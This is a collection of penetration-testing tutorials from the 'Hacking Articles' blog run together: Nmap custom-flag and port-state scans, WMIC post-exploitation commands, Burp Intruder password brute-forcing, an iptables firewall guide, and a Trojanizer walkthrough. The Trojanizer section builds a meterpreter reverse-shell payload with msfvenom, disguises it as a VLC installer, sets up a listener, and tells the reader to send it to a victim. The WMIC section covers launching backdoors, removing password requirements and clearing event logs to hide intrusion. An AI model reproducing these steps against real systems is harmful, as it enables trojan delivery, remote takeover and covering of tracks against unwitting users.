URG flag is used to set the high process priority of the packet to the target. So that target machine stops processing the current packet and process the URG Flag packet. In this scan we are sending the Urg flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x20 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-URG flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-URG packet for hex value 0x20 coming from 192.168.1.104 on port 21 as shown in given below image. 

XMAS Scan

In this scan we are sending the combination of hexadecimal value of the different flag on the target machine. As we know in Xmas scan combination of three TCP-flags [FIN, PSH, URG] are used to enumerate state of port.

By adding the value of the flag, which is equal to the hexadecimal value of the sender’s hexadecimal value as describe in given below table.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x29 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, PSH, URG] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, PSH, URG for hex value 0x29 coming from 192.168.1.104 on port 21 as shown in given below image. 

Manual Combination of Flags [FIN, SYN, PSH]

Let have a quick review over decimal to hexadecimal conversion with the help of following table:

Now repeat the same methodology by changing the combination of flag to enumerate the state of any port.  For example we want to scan any port by sending combination of three flags [FIN, SYN, and PSH] so let identify hex value for sum of three flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0B 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, SYN and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, SYN,PSH for hex value 0x0B coming from 192.168.1.104 on port 21 as shown in given below image. 

Manual Combination of Flags [FIN, RST, PSH]

Now repeat the same methodology by changing the combination of flag to enumerate the state of any port.  For example we want to scan any port by sending combination of three flags [FIN, RST, and PSH] so let identify hex value for sum of three flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0D 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, RST and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, RST,PSH for hex value 0x0D coming from 192.168.1.104 on port 21 as shown in given below image. 

Manual Combination of Flags [FIN, SYN, RST, PSH]

Now repeat the same methodology by changing the combination of flag to enumerate the state of any port.  For example we want to scan any port by sending combination of four flags [FIN, SYN, RST, and PSH] so let identify hex value for sum of four flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0F 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN,SYN, RST and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, SYN, RST,PSH for hex value 0x0F coming from 192.168.1.104 on port 21 as shown in given below image. 

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).    Contact Here

The post Nmap Scans using Hex Value of Flags appeared first on Hacking Articles.

This article is about Post Exploitation using the WMIC (Windows Management Instrumentation Command Line). When an Attacker gain a meterpreter session on a Remote PC, then he/she can enumerate a huge amount of information and make effective changes using the WMI Command Line.

To do this, we will first get the meterpreter session on the Remote PC which you can learn from here. After gaining the session, escalate its privilege to Administrator which you can learn from here.

WMIC command line can be accessed through the windows cmd. To access that type “shell” in the meterpreter shell.

Now let’s look at the wmic commands and their working

WMIC

This command shows the global options which are used in the wmic command. WMIC Global Options are used to set properties of the WMIC environment. With the combination of global options and the aliases than we can manage the system through the wmic environment.

Syntax/Example: wmic /?

Get System Roles, User Name, and Manufacturer

We can enumerates lots of information about the Victim System including its Name, Domain, Manufacturer, Model Number and Much more through the computer system alias of wmic command.

We are adding following filters to get specific result.

Roles: It gives all the roles that the victim system play like Workstation, Server, Browser etc.

Manufacturer: It give the manufacturer of the system, sometimes there are certain vulnerabilities in a particular model of a particular model. So we can use this information to search for any direct vulnerabilities.

UserName: It gives the username of the system which is proven very helpful as we can differentiate between administrators and normal users

[/format:list]: To sort the output in a list format.

Example: wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles /format:list

Get the SIDs

To enumerate these SIDs we will use group alias of wmic.

Syntax/Example: wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status

As shown in the below image here we have found the Account Name, Domain, Local Group Member status, SID and their status.

Create a process

We can create many process on the victim’s system using the process alias of wmic command.

This is helpful in running any backdoor or fill up the memory of the victim’s system.

Syntax: wmic process call create “[Process Name]”

Example:  wmic process call create “taskmgr.exe”

As you can see in the below screenshot that this command not only create a process but also gives the “process id” so that we can manipulate that process according to our need.

Note: if the process creates a window like Task Manager, cmd, etc. then this command will open up that window on victim’s system and create suspicion in the mind of victim.

Change Priority of a Process

We can change priority of any process running on the victim’s system with the help of process alias of wmic command.

This is an important feature because it can be used manipulate processes as we can increase the priority of any process of our choice or decrease priority of any process. Decreasing the priority of any process can result in crashing of that particular application and increasing may crash the overall system.

Example: wmic process where name=”explorer.exe” call set priority 64

Terminate a process

We can terminate process running on the victim’s system with the help of process alias of wmic command.

Example: wmic process where name=”explorer.exe” call terminate

Get a list of Executable Files

We can get a list which contains the location of the executable files other than that of windows.

Example: wmic process where “NOT ExecutablePath LIKE ‘%Windows%’” GET ExecutablePath

Get Folder Properties

To extract the basic information about a folder on the victim’s system we can use fsdir alias of wmic command line.

It can enumerate following information about a folder:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

Example: wmic fsdir where=”drive=’c:’ and filename=’test’” get /format:list’

Get File Properties

To extract the basic information about a file on the victim’s system we can use datafile alias of wmic command line.

It can enumerate following information about a file:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

Syntax: wmic datafile where=’[Path of File]’ get /format:list

Example: wmic datafile where name=’c:\\windows\\system32\\demo\\demo.txt’ get /format:list

Locate System Files

Extract paths of all the important system files like temp folder, win directory and much more.

Example: wmic environment get Description, VariableValue

From given below image you can read variablevalue with their given description.

Get a list of Installed Applications

We can get a list of applications or softwares installed on the victim’s system

Example: wmic product get name

Get a list of Running Services

We can fetch the list of services which are running and services which start automatically or not.

Example: wmic service where (state=”running”) get caption, name, startmode

From given below image you can observe startmode either as “Auto” or as “Manual” and state “Running” for given services.

Get Startup Services

We can enumerate startup services using startup alias for all the services that run during the windows startup.

Example: wmic startup get Caption, Command

Get System Driver Details

We can enumerate Driver Details like Name, Path and Service Type using the sysdrive alias.

This command gives the path of the driver file, its status (Running or Stopped), Its Type (Kernel or File System)

Example: wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

Get OS Details

We can enumerate the location of the victim by using the time zone in which the system is set, this can be extracted using the os alias.

We also get the Last Boot Update Time and The Number of Registered Users and Number of Processors and information about Physical & Virtual Memory, all using os alias.

Example: wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpdate, NumberofProcesses, NumberofUsers, Organization, RegisteredUsers, Status /format:list

Get the Motherboard Details

We can use the baseboard alias of wmic command line to enumerate the motherboard details of victim’s system. Things we can enumerate are Motherboard Manufacturer, Serial Number and Version

Example: wmic baseboard, get Manufacturer, Product, SerialNumber, Version

Get BIOS Serial Number

We can use the bios alias of wmic command line to enumerate the bios details of victim’s system.

Example: wmic bios, get serialNumber

From given below image you can check bios serial number that we have enumerate of victim’s system.

Get Hard Disk Details

We can enumerate information about the System Hard Disk using the diskdrive alias.

We get to know the Interface Type, Manufacturer and Model Name, all through this command.

Syntax: wmic diskdrive get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType /format:list

Get Hard Disk Partitions Details

We can get the information about the Hard Disk Partitions using the logicaldisk alias.

We get the name, compression status, File System (NTFS, FAT) and much more all using this command.

Syntax: wmic logicaldisk where drivetype=3 get Name, Compressed, Description, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName

From given below image you can read description of disk along with filesystem i.e. NTFS and available free space and many more details as per your requirement.

Get Memory Cache Details

We can get the information about the Memory Cache using memcache alias. We can get the name, block size, purpose and much more all using this command.

Example: wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status

From given below image you can observe here it is showing details of two cache memory.

Get Memory Chip Details

We can get the information about the RAM using the memorychip alias.

We get the Serial number of the RAM without removing the RAM or physically being near the system using this command.

Example: wmic memorychip get PartNumber, SerialNumber

Detect If victim system is a host OS or installed via VMware

We can enumerate information about the victim’s system that weather it is running a host operating system i.e. running by directly installing on hard drive or running virtually using VMware or Virtual Box.

Syntax: wmic onboarddevice get Desciption, DeviceType, Enabled, Status /format:list

Here from given below image if you will observe the highlighted text then you see it showing VMware in description.

User Account Management

Lock a User Account

We can restrict a local user from using its account by using useraccount alias, here we are going to lock a User Account.

Example: wmic useraccount where name=’demo’ set disabled=false

From given below image you can observe that we had successfully locked the user account for user “demo”.

Remove Password requirement for logging

We can remove a local user’s requirement of its password for login by using useraccount alias

Example: wmic useraccount where name=’demo’ set PasswordRequired=false

Rename a user account

We can rename a local user by using useraccount alias

Example: wmic useraccount where name=’demo’ rename hacker

Restrict user from changing a password

We can restrict a local user from changing its password by using useraccount alias

Example: wmic useraccount where name=’hacker’ set passwordchangeable=false

Get Antivirus Details

We can enumerate the antivirus installed on the victim’s system along with its location and version.

Syntax: wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe

Clear System Logs

Wmic can be used to delete system logs using the nteventlog alias. It is a very simple command where we mention the name of log and then using an option nteventlog and clear the log file. It can be an effective command while cleaning up after hacking any system.

Syntax: wmic nteventlog where filename='[logfilename]’ cleareventlog

Example: wmic nteventlog where filename=’system’ cleareventlog

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Post Exploitation Using WMIC (System Command) appeared first on Hacking Articles.

Hello friends!! Today we are going to discuss “Payload Processing” option of Burpsuite which is advance functionality comes under Intruder Tab for making brute force attack.

Payload Processing

Payload Processing can be defined as when payloads are generated using payload types, they can be further manipulated or filtered using various processing rules and payload encoding.

Payload Processing Rules

These rules are defined to perform various processing task on each payload before it is used. These rules are executed in a sequence, and they can be used to help debug any problem with the configuration. Payload processing rules are useful in situations where you need to generate different payloads, or where we want to wrap payloads within a wider structure or encoding scheme.

There are 12 types of payload processing rules available:

• Add prefix
• Add suffix
• Match / Replace
• Substring
• Reverse substring
• Modify case
• Encode  
• Decode
• Hash
• Add raw payload
• Skip if matches regex
• Invoke Burp extension

Let’s start!!

Add Prefix

This processing rule adds up a prefix before the payload.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

 Before executing the attack we have added a payload processing rule to the payload type which is Add Prefix and we have given an input string “hash” which is added as a prefix with every input strings in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack as shown in the image.

Add Suffix

This processing rule adds up a suffix after the payload.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as

• In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Add Suffix and we have given an input string “1234” which is added as a suffix with every input strings in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Match / Replace

This processing rule is used to replace any part of the payload that match a specific regular expression, with a string.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as

• In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Match / Replace and we have given an input “9870” in the Match Regex which will match the input given with the input strings in the dictionary, if the there is a certain match than it will replace it with the input “1234” given in the Replace with as shown in the image.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Substring

This processing rule is used to extracts a sub-portion of the payload, starting from a specified offset up to a specified length. Here the offset and length are counted from the front.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as

• In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. Here we had added dictionary using option “Add from list” as shown below in given image.

Before executing the attack we have added a payload processing rule to the payload type which is Substring and we have given an input “0” in From option which specifies the offset and a input “3” in the Length option which specifies the length of the input strings.

For example if “password” is word in dictionary and we had applied above filter so it will place alphabet p = 0; a = 1; s = 2 and s = 3 hence it will read only pass from whole word “password”.

The length specified will select only those inputs having the specific length and other lower or greater length inputs are discarded as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Reverse Substring

This processing rule is used as a substring rule, but the end offset is specified counting backwards from the end of the payload, and the length is counted backwards from the end offset.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as sniper

• In the given below image we have selected password that means we will need one dictionary files for password.

 Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. Here we had added dictionary using option “Add from list” as shown below in given image.

Before executing the attack we have added a payload processing rule to the payload type which is Reverse Substring and we have given an input “2” in From option which specifies the offset and an input “9” in the Length option which specifies the length of the input strings and they are similar to the Substring rule but it works from backwards of a offset and the length is counted backwards where the offset ends.

For example if “admin123456” is word in dictionary and we had applied above filter so it will place alphabet 4 = 0; 3 = 1 ; 2 = 2 ; 1 = 3 ; n = 4 ; i = 5 ; m = 6 ; d = 7 ; d = 8 ; a = 9  hence it will read  only ‘admin1234’ from whole word “admin123456”.

The length specified will select only those inputs having the specific length and other lower or greater length inputs are discarded as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Modify Case

This processing rule can be used to modify the case of the payload, if needed. This rule has the same options available for the Case Modification payload type which we have explained in Part-1 of the Payload types article.

Source: portswigger.net

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Payload Processing Rule in Burp suite (Part 1) appeared first on Hacking Articles.

Hello friends!! In this article we are going to discuss on Iptables and its uses. Iptables is a command-line firewall, installed by default on all official Ubuntu distributions. Using Iptables, you can label a set of rules, that will be go after by the Linux kernel to verify all incoming and outgoing network traffic.

Today we will look at some basic concept of Ipatble using various Iptables options to generate a Filter Table which will filter the incoming and outgoing traffic

Basic Iptables Options

-A :  Add this rule to a rule chain.

-L:  List the current filter rules.

-m conntrack : Allow filter rules to match based on connection state. Permits the use of the –ctstate option.

–ctstate: Define the list of states for the rule to match on. Valid states are:

• NEW – The connection has not yet been seen.
• RELATED – The connection is new, but is related to another connection already permitted.
• ESTABLISHED – The connection is already established.
• INVALID – The traffic couldn’t be identified for some reason.

-m limit: Require the rule to match only a limited number of times. Allows the use of the –limit option.

Useful for limiting logging rules:

• –limit – The maximum matching rate, given as a number followed by “/second”, “/minute”, “/hour”, or “/day” depending on how often you want the rule to match. If this option is not used and -m limit is used, the default is “3/hour”.

-p: Describe the connection protocol used.

–dport :  The destination port(s) required for this rule. A single port may be given, or a range may be given as start: end, which will match all ports from start to end, inclusive.

-j :  Jump to the specified target. By default, iptables allows four targets:

• ACCEPT – Accept the packet and stop processing rules in this chain.
• REJECT– Reject the packet and notify the sender that we did so, and stop processing rules in this chain.
• DROP– Silently ignore the packet, and stop processing rules in this chain.
• LOG– Log 

-I: Inserts a rule. Takes two options, the chain to insert the rule into, and the rule number it should be.

-I:  INPUT 5 would insert the rule into the INPUT chain and make it the 5th rule in the list.

-s: –source – address [/mask] source specification

-d: –destination – address[/mask] destination specification

Iptables follow Ipchain rules which is nothing but the bunch of firewall rules to control incoming and outgoing traffic

Three Important Types Iptable chains

Input Chain:  Input chain rule rule is used to manage the activities of incoming traffic towards server.

Output Chain: Ouput chain rule is used to manage the activities of outgoing traffic from your server.

Forward Chain: A forward chain rule is used for adding up rules related to forwarding of an ip packet. This is usually used while you have a Linux machine as router linking two networks collectively.

As discribed above by default install iptable is availabe in all Ubuntu distribution but if it is not installed in any Linux based system and you want to install it then excute given below command.

sudo apt-get install iptables

By default iptable is blank which allows all incoming and outgoing connection traffic without filtering them. In order to verify inbuilt rules of iptable we need to execute following command which displays the list of rules if added in iptables.

sudo iptables -L -v

here -L is used for display the chain rules of iptables and  -v for complete information.

Allow Incoming Traffic

In order to allow traffic for any particular port you can use given below command here we have accept incoming on port 22 for SSH, 80 for HTTP and 443for HTTPS respectively

sudo iptables -A INPUT -p tcp –dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp –dport 80 -j ACCEPT

sudo iptables -A INPUT -p tcp –dport 443 -j ACCEPT

So it will allow tcp connection when traffic will coming on port 22, 80 and 443.

Drop/Deny Incoming Traffic

In order to deny traffic for any particular port you can use given below command here we have drop incoming on port 21 for FTP and 23 for Telnet respectively

sudo iptables -A INPUT -p tcp –dport 21 -j DROP

sudo iptables -A INPUT -p tcp –dport 23 -j DROP

So it will deny tcp connection when traffic will coming on port 21, 23 and give a message Time Out.

Reject Incoming Traffic

Reject and Drop action closely work same in order to obstruct the incoming traffic from establishing connection with server only the difference is that, here it will send message with “ICMP message Port Unreachable” and drop the incoming packet. You can use given below command here we have reject incoming on port 25 for SMTP.

sudo iptables -A INPUT -p tcp –dport 25 –j REJECT

So it will drop tcp connection when traffic will coming on port 25 and give a message Destination Port unreachable.

Allow Incoming Traffic from Specific IP

In order to allow traffic form only a particular IP to establish a secure connection between server and client you can execute given below command

sudo iptables -A INPUT -s 192.168.1.104 -j ACCEPT

It will accept packet coming from network 192.168.1.104

Block Specific Network IP

In order to deny traffic form only a particular IP to establish a secure your server from attacker’s IP you can execute given below command

sudo iptables -A INPUT -s 192.168.1.102 -j DROP

It will deny packet coming from network 192.168.1.102

Block Specific Network Interface

To block a specific network interface, for example eth0, execute given below command which drop the incoming traffic coming from 10.10.10.10

sudo iptables -A INPUT -i eth0 -s 10.10.10.10-j DROP

Here you can change the action to allow traffic from a particular network interface using –j ACCEPT options.

Block Specific IP Range

To block a specific IP range in order to deny, the incoming traffic coming from specific range of IP. Execute given below command which drop incoming packet coming from IP 192.168.1.100 till IP 192.168.1.200

sudo iptables -A INPUT -m iprange –src-range 192.168.1.100-192.168.1.200 -j DROP

Here you can change the action to allow traffic from a particular IP range using –j ACCEPT options.

Block Specific Mac Address

To block a specific Mac address in order to deny, the incoming traffic coming from specific machine. Execute given below command which drop incoming packet coming from given Mac address or attacker machine.

sudo iptables -A INPUT -m mac –mac-source FC:AA:14:6A:9A:A2 -j DROP

Here you can change the action to allow traffic from a particular Mac address using –j ACCEPT options.

Block Ping Request

Network administrator always concern with network security therefore they always Block Ping request either by using Drop or Reject action , here we are blocking Ping request using DROP option as given in below command.

sudo iptables -A INPUT -p icmp -i eth0 -j DROP

View List of Applied Chain rules

In order to view our applied chain rules once again we are going to execute given below command which will dump list of Iptable rules.

sudo iptables -L

From given below image you can observe 4 columns which contains records of IPtable rules.

Here these columns define following information:

Target: Defines applied action

Prot: stand for Protocol type that can TCP, ICMP or UDP

Option: further option to define rule, here it is blank

Source: Incoming traffic network IP Address

Destination: Host IP address which will receive incoming traffic packet.

Now if someone tries to Ping the server machine as shown in given below image, so here you can read the message “Request timed out” which means the server machine has drop our ICMP request packet.

Deleting Any Rule

In order to delete any rule of your Iptable to remove it from inside your filter table you can use option -D with input rule number.  We are going to remove our last rule ICMP drop connection which was at number 12 in the given list of rule.

sudo iptables -D INPUT 12

Here you can replace number 12 from any other number which rule you wish to remove according to your list of rules.

Let’s view our remaining chain rules once again using -L option as done above. From given below image you can observe that now the list contain only 11 rules and eliminated  rule ICMP drop the connection.

Flush IPtables

If you want to remove entire set of rule in order to flush your Iptable then use option -F to flush your ipatble applied rules and execute given below command.

sudo iptables -F

Now once again when we had viewed the list of rule, this time we got empty table as shown in given below image.

Source: https://help.ubuntu.com/community/IptablesHowTo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to IPtables appeared first on Hacking Articles.

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable (.exe) archive. The SFX archive when executed it will run both files (our payload and the legit application at the same time).

How to get Trojanizer?

You can clone using this Github link:

Command: git clone https://github.com/r00t-3xp10it/trojanizer.git

Now Before Running the Trojanizer we will create a payload using msfvenom

Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

Running Trojanizer

Open the terminal in the Directory where you have cloned the git file. Here you will find a Trojanizer.sh File run it using

Command: ./Trojanizer.sh

Trojanizer has some prerequisites which it will try to install on the initial run. If it could install you could install manually the below mentioned prerequisites.

Wine Program Files, WinRAR Software and Zenity.

After Loading the Tool, it will ask you if you want to execute the Framework

Clicking Yes Will Open a Window Titled Payload to Be Compressed, here we will select the payload that we created using msfvenom in the beginning of the practical.

After selecting the payload another window will open titled Legit Application to Trojanize

Here we will have to select any legit or original software file (.exe) to bind with our payload. I am binding VLC Player Installer File with my payload.

After clicking OK we will be asked for a New Name for the combined file. Keep it like any installer File. For Example: vlc-32bit-Installer or vlc-update64 or anything of your choice.

Now we will have to select any icon for our combined file. You can choose from the list given by default or you can download any icon file (.ico) from Google.

I have downloaded the VLC Icon. As you can see in the above image I am adding the vlc-icon.ico file as an icon.

Note: Trojanizer works with WINRAR and because of that many a times this icon doesn’t bind with the combined file, instead it shows a WinRAR icon. It is a bug we soon hope will be fixed.

After selecting the icon file. You will be granted with this window informing you about the path of the newly payload combined software.

Now Let’s Start a Listener on the port we mentioned as a lhost earlier. Start with opening Metasploit Framework by typing

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.111

msf exploit(multi/handler) > set lport 4466

msf exploit(multi/handler) > run

Now send the malicious software to the victim by any means you desire.

When the user will open the file, he will be greeted with the normal security warning as it is normally shown.

After clicking Run the user will have the VLC installer running and he won’t suspect anything.

But as he clicks Run we will also have his meterpreter session as shown below.

That’s how we can bind our payload file with any original software file (.exe) using Trojanizer.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Bind Payload using SFX archive with Trojanizer appeared first on Hacking Articles.

Hello friends, several times you might have used NMAP to performing Network scanning for enumerating active Port services of target machine but in some scenarios you don’t get simple message if a port open or close.

Let’s Begin

Requirement

Attacker’s IP:  192.168.1.109 [Kali Linux]

Target’s IP: 192.168.1.119 [Ubuntu]

The states of ports are not their essential properties; it depicts how nmap sees them. In nmap a port is divided into six states:

Open:  This state means that an application on the target machine is listening for connections/packets on that port.

 Closed: This state means ports have no application listening on them, though they could open up at any time.

Filtered: This state means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed. 

Unfiltered: ports are classified as unfiltered when they are responsive to Nmap’s probes, but Nmap cannot determine whether they are open or closed.

Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.

Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.

Open Port

In this case a service or application running on a port is actively accepting TCP, UDP connections. We send TCP packets to port 80 of target machine. We find that the port is open.

nmap -p80 192.168.1.119

We take a look at wireshark and find that 3 way-handshake occurs as given below.

• Nmap sends SYN packet on port 80
• Nmap received SYN, ACK packet as response from port 80 which denotes port 80 is open.
• Nmap sends RST packet

Closed Port

In this case a service or application on a port is accessible but no application is running on it. When a port is in closed state it sends RST with ACK packet when it receives TCP SYN packet

Nmap -p80 192.168.1.119

Now we have used SYN scan to send TCP SYN packets on port 80 of target machine and found that the target is closed. That is because as soon as it receives TCP SYN packet it sends back TCP RST, ACK packet.

We check wireshark to find more information, as expected as soon as the target machine received TCP SYN packet it replied with TCP RST and NMAP interpreted it as port is closed.

• Nmap sends SYN packet on port 80
• Nmap received RST, ACK packet as response from port 80 which denotes port 80 is closed.

Filtered Port

In this case Nmap is unable to determine whether a port is open because packet filtering is preventing the packets from reaching the port. When a packet is dropped Nmap retries several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.

Let’s use iptables to drop TCP packets on the target machine.

iptables -I INPUT -p tcp -j DROP

Now when we scan the target machine, the packets will be dropped as soon as it receives TCP packets.

nmap -p80 192.168.1.119              

From given below image you can observe that it is now showing state “filtered” for port 80.

Let’s take a look at wireshark we find that when Nmap send TCP SYN packet we get no reply from the target machine. This means that a packet filter or firewall is dropping our packets.

Unfiltered Port

The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.

We use iptables to drop any TCP packet coming to port 80 in target machine.

Iptables -I INPUT -p tcp–dport=80 -j DROP

Now we use nmap ACK scan to scan the target machine to check if there is any firewall or not.

nmap –sA -p22,80 192.168.1.119

As we can see in given below image the port without firewall shows unfiltered as Nmap is unable to determine if it is open or close.

We can see in wireshark that for port 22 we get a RST packet whereas in case of port 80 the packet is dropped by the target machine.

Open|Filtered Port 

In this case nmap is unable to determine if a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.

Let’s use nmap Xmas scan to scan the target machine.

nmap -sX -p80 192.168.1.119

As we can see the nmap scan shows us the port to be open| filtered.

We check wireshark to analysis the sent packets by nmap and we can see we don’t get a reply even if the port is open.

Closed|Filtered Port

This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.

We use iptables on our target machine to drop incoming TCP packets on the target machine.

iptables -I INPUT -p tcp-j DROP

We IP ID idle scan on the target machine using 192.168.1.107 as our zombie.

nmap -p80 -sI 192.168.1.107 192.168.1.119

As we can see in idle scan the zombie it is showing state closed|filtered for port 80.

An idle scan consists of three steps that are repeated for each port:

1. Probe the zombie’s IP ID and record it.
2. Forge a SYN packetfrom the zombie and send it to the desired port on the target. Depending on the port state, the target’s reaction may or may not cause the zombie’s IP ID to be incremented.
3. Probe the zombie’s IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1.

We check Wireshark and find that find the entire process.

Source: https://nmap.org/book/man.html

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Comprehensive Guide to Nmap Port Status appeared first on Hacking Articles.

Today we are going to learn about the session’s command of the Metasploit Framework.  Sessions command basically helps us to interact and manipulate with the various sessions created through the exploits while hacking. Sessions command is usually just used to get into the session but it is far more useful than just that. Sessions command can run a single command on multiple sessions, and also upgrade a normal shell to meterpreter.  

Requirement

Attacker: Kali Linux

Targets: Any operating system

Open kali Linux terminal and type msfconsole in order to load metasploit framework.  Now you need to compromise victim’s machine once to achieve any type of session either metrepreter or shell and to do so you can read our previous article from here.

So once you have obtained victim’s machine session you can perform many operation in victim’s system for retrieving important information.  Using help command we can check the list of options that we can use with session command.

Command: sessions –h

From given below image you can observe that it had shown many option which will be quite useful for system enumeration

